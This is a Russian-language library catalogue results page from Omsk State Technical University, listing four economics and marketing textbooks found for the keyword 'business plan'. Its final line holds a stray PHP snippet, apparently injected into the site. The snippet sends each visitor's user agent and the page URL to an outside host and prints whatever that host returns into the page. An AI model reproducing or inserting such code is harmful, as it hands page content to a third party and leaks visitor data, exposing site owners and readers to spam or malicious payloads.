Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

129 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Бизнес-план")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 4
1. 
Горемыкин, Виктор Андреевич. Бизнес-план : методика разработки : 45 реальных образцов бизнес-планов / В. А. Горемыкин, 2006. - 864 с.
Держатели документа (Информация об экземплярах) 
2. 
Экономика предприятия [Текст] : тесты, задачи, ситуации: учеб. пособие для вузов по экон. специальностям / В. А. Швандар [и др.] ; под ред. В. А. Швандара, 2005. - 253, [1] с.

Новое издание сборника тестов, задач, ситуаций подготовлено по учебной дисциплине "Экономика предприятия". Базовыми учебниками, структура и содержание которых взяты за основу сборника, послужили "Экономика предприятия" и "Предпринимательство".

Представлены такие темы, как "<Себестоимость>, <прибыль> и <рентабельность>", "<Основные> <фонды> и <производственные> <мощности>", "<Оборотные> <фонды> и оборотные <средства>", "<Планирование> и <прогнозирование> на предприятии", "<Акционерные> формы хозяйствования", "<Бизнес-план>", "<Налогообложение>", "<Анализ> <финансового> <состояния>". Отдельным разделом даются основные формулы для расчетов.

3. 
Маркетинг [Текст] : Учеб. для вузов / Г. А. Васильев, В. Я. Горфинкель, Л. А. Ибрагимов и др.; Под ред. Г. А. Васильева, 2004. - 207, [1] с.
Держатели документа (Информация об экземплярах) 

В доступной форме изложены основы маркетинга -социально-экономическая сущность и функции маркетинга, система маркетинговых исследований, <товар>, <товарная> <политика>, <реализация> товара, маркетинговые <коммуникации>, управление маркетингом на <предприятии>, <бизнес-план> и <международный> маркетинг.

4. 
Маркетинг [Текст] : Учеб. для вузов / Ред. Г. А. Васильев, 2002. - 207, [1] с.

В доступной форме изложены основы маркетинга - социально-экономическая сущность и функции маркетинга, система <маркетинговых исследований>, <товар>, <товарная политика>, реализация товара, маркетинговые <коммуникации>, управление маркетингом на предприятии, <бизнес-план> и <международный> маркетинг.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3019 - 15.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.85 с.12 запросов, 0.82c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;